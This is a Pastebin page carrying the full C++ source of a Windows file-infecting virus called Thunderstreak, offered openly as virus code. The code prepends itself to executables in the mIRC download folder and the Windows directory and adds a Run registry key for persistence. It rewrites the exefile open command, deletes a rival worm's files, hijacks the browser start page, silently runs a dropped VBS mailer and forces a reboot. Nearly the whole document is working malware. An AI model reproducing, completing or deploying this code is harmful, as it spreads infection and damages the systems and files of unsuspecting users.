Advertisement
FlyFar

Thunderstreak - C Virus Source Code

Feb 2nd, 2023 (edited)
750
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.81 KB | None | 0 0
  1. #include <iostream>
  2. #include <windows.h>
  3. #include <tlhelp32.h>
  4. #include "thunderstreak.h"
  5.  
  6. #define VIRUSSIZE 32
  7.  
  8. using namespace std;
  9.  
  10. char VirCheck(char SRCFileName[])
  11. {
  12.     FILE *SRC;
  13.     char Buffer[1];
  14.     int v=0;
  15.     SRC=fopen(SRCFileName,"rb");
  16.  
  17.     if(SRC)
  18.     {
  19.         fseek(SRC,19,0);
  20.         fread(Buffer,1,1,SRC);
  21.     }
  22.  
  23.     fclose(SRC);
  24.     return Buffer[0];
  25. }
  26.  
  27. void WriteVirus(char SRCFileName[],char DSTFileName[])
  28. {
  29.     FILE *SRC, *DST;
  30.     char Buffer[1024];
  31.     short Counter=0;
  32.     int v = 0;
  33.     SRC=fopen(SRCFileName, "rb");
  34.     if(SRC)
  35.     {
  36.         DST = fopen(DSTFileName, "wb");
  37.         if(DST)
  38.         {
  39.             for (v=0;v < VIRUSSIZE;v++)
  40.             {
  41.                 Counter = fread(Buffer, 1, 1024, SRC);
  42.                 if(Counter)
  43.                     fwrite(Buffer, 1, Counter, DST);
  44.             }
  45.         }
  46.     }
  47.     fclose(SRC);
  48.     fclose(DST);
  49. }
  50.  
  51. void AddOrig(char SRCFileName[],char DSTFileName[])
  52. {
  53.     FILE *SRC,*DST;
  54.     char Buffer[1024];
  55.     short Counter=0;
  56.     SRC=fopen(SRCFileName,"rb");
  57.     if(SRC)
  58.     {
  59.         DST=fopen(DSTFileName,"ab");
  60.         if(DST)
  61.         {
  62.             while(!feof(SRC))
  63.             {
  64.                 Counter=fread(Buffer,1,1024,SRC);
  65.                 if(Counter)
  66.                 fwrite(Buffer,1,Counter,DST);
  67.             }
  68.         }
  69.     }
  70.     fclose(SRC);
  71.     fclose(DST);
  72. }
  73.  
  74. void InfectFile(char hostfile[],char virus[])
  75. {
  76.     CopyFile(hostfile,"yahasux.exe",FALSE);
  77.     WriteVirus(virus,hostfile);
  78.     AddOrig("yahasux.exe",hostfile);
  79. }
  80.  
  81. void CopyOrig(char SRCFileName[], char DSTFileName[])
  82. {
  83.     FILE *SRC,*DST;
  84.     char Buffer[1024];
  85.     short Counter=0;
  86.     int v=0;
  87.     SRC=fopen(SRCFileName,"rb");
  88.     if(SRC)
  89.     {
  90.         DST=fopen(DSTFileName,"wb");
  91.         if(DST)
  92.         {
  93.             fseek(SRC,(VIRUSSIZE*1024),0);
  94.  
  95.             while(!feof(SRC))
  96.             {
  97.                 Counter=fread(Buffer,1,1024,SRC);
  98.                 if(Counter)
  99.                 fwrite(Buffer,1,Counter,DST);
  100.             }
  101.         }
  102.     }
  103.     fclose(SRC);
  104.     fclose(DST);
  105. }
  106.  
  107. bool FileExists(char *FileName)
  108. {
  109.     HANDLE Exists;
  110.     Exists=CreateFile(FileName,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0);
  111.     if(Exists==INVALID_HANDLE_VALUE)
  112.     return false;
  113.     CloseHandle(Exists);
  114.     return true;
  115. }
  116.  
  117. int KillWinServices ()
  118. {
  119.     HANDLE PrListHandle,PrHandle;
  120.     PROCESSENTRY32 processList;
  121.     int counter = 0;
  122.  
  123.     PrListHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
  124.  
  125.     while (true)
  126.     {
  127.         if (counter == 0)
  128.         {
  129.             if (Process32First(PrListHandle, &processList) == FALSE && GetLastError()==ERROR_NO_MORE_FILES)
  130.             {
  131.                 CloseHandle(PrListHandle);
  132.                 return false;
  133.             }
  134.         }
  135.         else
  136.         {
  137.             if (Process32Next(PrListHandle, &processList) == FALSE)
  138.             {
  139.                 if (GetLastError() != ERROR_NO_MORE_FILES)
  140.                 {
  141.                     CloseHandle(PrListHandle);
  142.                     return false;
  143.                 }
  144.                 else
  145.                 {
  146.                     CloseHandle(PrListHandle);
  147.                     break;
  148.                 }
  149.             }
  150.         }
  151.  
  152.         if (strstr(processList.szExeFile,"WinServices.exe")||strstr(processList.szExeFile,"WINSER~1.EXE"))
  153.         {
  154.             PrHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, processList.th32ProcessID);
  155.             if (!TerminateProcess(PrHandle, NULL))
  156.                 return false;
  157.             else
  158.                 return true;
  159.             CloseHandle(PrHandle);
  160.         }
  161.         counter++;
  162.     }
  163.     return false;
  164. }
  165.  
  166. void main(int argc, char **argv)
  167. {
  168.     struct HKEY__* reghandle;
  169.     char sysdir[50],windir[40],MyDocsPath[MAX_PATH],winstartpath[70];
  170.     DWORD MyDocsLength=MAX_PATH;
  171.     WIN32_FIND_DATA FileData;
  172.     HANDLE SearchHandle,hToken;
  173.     FILE* MailFile;
  174.     const unsigned char startpage[]="http://127.0.0.1";
  175.     TOKEN_PRIVILEGES tkp;
  176.     OSVERSIONINFO winver;
  177.  
  178.     winver.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
  179.     GetVersionEx(&winver);
  180.  
  181.     GetSystemDirectory(sysdir,50);
  182.     SetCurrentDirectory(sysdir);
  183.  
  184.     if(FileExists("nav32_loader.exe")&&!(FileExists("c:\\MathMagic.scr")))
  185.     {
  186.         WriteVirus(argv[0],"winstart.exe");
  187.         strcpy(winstartpath,sysdir);
  188.         strcat(winstartpath,"\\winstart.exe");
  189.  
  190.         if(KillWinServices())
  191.         {
  192.             RegSetValue(HKEY_LOCAL_MACHINE,"Software\\Classes\\exefile\\shell\\open\\command",REG_SZ,"\"%1\" %*",7);
  193.             RegSetValue(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",REG_SZ,"\"%1\" %*",7);
  194.             RegSetValue(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",REG_SZ,winstartpath,strlen(winstartpath));
  195.  
  196.             RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",&reghandle);
  197.             RegQueryValueEx(reghandle,"Personal",NULL,NULL,(BYTE*)MyDocsPath,&MyDocsLength);
  198.             RegCloseKey(reghandle);
  199.  
  200.             RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&reghandle);
  201.             RegDeleteValue(reghandle,"WinServices");
  202.             RegCloseKey(reghandle);
  203.  
  204.             DeleteFile("WinServices.exe");
  205.             DeleteFile("nav32_loader.exe");
  206.             DeleteFile("hotmail_hack.exe");
  207.             DeleteFile("friendship.scr ");
  208.             DeleteFile("world_of_friendship.scr ");
  209.             DeleteFile("shake.scr");
  210.             DeleteFile("Sweet.scr");
  211.             DeleteFile("Be_Happy.scr ");
  212.             DeleteFile("Friend_Finder.exe");
  213.             DeleteFile("I_Like_You.scr");
  214.             DeleteFile("love.scr");
  215.             DeleteFile("dance.scr");
  216.             DeleteFile("GC_Messenger.exe");
  217.             DeleteFile("True_Love.scr");
  218.             DeleteFile("Friend_Happy.scr");
  219.             DeleteFile("Best_Friend.scr");
  220.             DeleteFile("life.scr");
  221.             DeleteFile("colour_of_life.scr");
  222.             DeleteFile("friendship_funny.scr");
  223.             DeleteFile("funny.scr");
  224.    
  225.             SetCurrentDirectory(MyDocsPath);
  226.             SearchHandle=FindFirstFile("*.*",&FileData);
  227.             SetFileAttributes(FileData.cFileName,FILE_ATTRIBUTE_NORMAL);
  228.    
  229.             while(FindNextFile(SearchHandle,&FileData))
  230.             SetFileAttributes(FileData.cFileName,FILE_ATTRIBUTE_NORMAL);
  231.         }
  232.     }
  233.  
  234.  
  235.     if(strstr(argv[0],"winstart.exe"))
  236.     {
  237.         DeleteFile("tcpsvs32.exe");
  238.         MessageBox(NULL,"Hi there.. it seems you were infected with Thunderstreak. That worm however, written by an idiot who sPeLlS lIkE tHiS, abused my website and got me to receive the complaints. Therefore, I have just disinfected you. Don't worry tho.. as I didn't wanna steal from you, I gave you this virus (Win32.HLLP.Thunderstreak) in return ","Exchange viruses?",MB_OK|MB_ICONINFORMATION);
  239.     }
  240.  
  241.     if(FileExists("c:\\progra~1\\mirc\\mirc.exe"))
  242.     {
  243.         SetCurrentDirectory("c:\\progra~1\\mirc\\download");
  244.         SearchHandle=FindFirstFile("*.exe",&FileData);
  245.         if(SearchHandle!=INVALID_HANDLE_VALUE)
  246.         {
  247.             if(VirCheck(FileData.cFileName)!='g')
  248.                 InfectFile(FileData.cFileName,argv[0]);
  249.  
  250.             while(FindNextFile(SearchHandle,&FileData))
  251.             {
  252.                 if(VirCheck(FileData.cFileName)!='g')
  253.                         InfectFile(FileData.cFileName,argv[0]);
  254.             }
  255.  
  256.             DeleteFile("yahasux.exe");
  257.         }
  258.     }
  259.  
  260.     RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",&reghandle);
  261.     RegSetValueEx(reghandle,"Start Page",0,REG_SZ,startpage,16);
  262.  
  263.     GetWindowsDirectory(windir,40);
  264.     SetCurrentDirectory(windir);
  265.  
  266.     if(winver.dwPlatformId==VER_PLATFORM_WIN32_NT)
  267.     {
  268.         SearchHandle=FindFirstFile("*.exe",&FileData);
  269.         if(VirCheck(FileData.cFileName)!='g')
  270.             InfectFile(FileData.cFileName,argv[0]);
  271.    
  272.         while(FindNextFile(SearchHandle,&FileData))
  273.         {
  274.             if(strcmp(FileData.cFileName,"explorer.exe")&&VirCheck(FileData.cFileName)!='g'&&strcmp(FileData.cFileName,"yahasux.exe"))
  275.                 InfectFile(FileData.cFileName,argv[0]);
  276.         }
  277.  
  278.         DeleteFile("yahasux.exe");
  279.     }
  280.  
  281.     if(!(FileExists("c:\\MathMagic.scr")))
  282.     {
  283.         WriteVirus(argv[0],"c:\\MathMagic.scr");
  284.         fwrite(MailData,2346,1,MailFile=fopen("yahasux.vbs","wb"));
  285.         fclose(MailFile);
  286.         ShellExecute(NULL,"open","yahasux.vbs",NULL,NULL,SW_HIDE);
  287.  
  288.         if(winver.dwPlatformId==VER_PLATFORM_WIN32_NT)
  289.         {
  290.             OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken);
  291.             LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
  292.             tkp.PrivilegeCount=1;  
  293.             tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
  294.             AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);
  295.         }
  296.  
  297.         Sleep(40000);
  298.         ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
  299.     }
  300.  
  301.     if(!(strstr(argv[0],"winstart.exe")||strstr(argv[0],"MathMagic.scr")||strstr(argv[0],"thunderstreak.exe")))
  302.     {
  303.         CopyOrig(argv[0],"screwthunder.exe");
  304.         WinExec("screwthunder.exe",SW_SHOWNORMAL);
  305.         while(!DeleteFile("screwthunder.exe")){}
  306.     }
  307. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement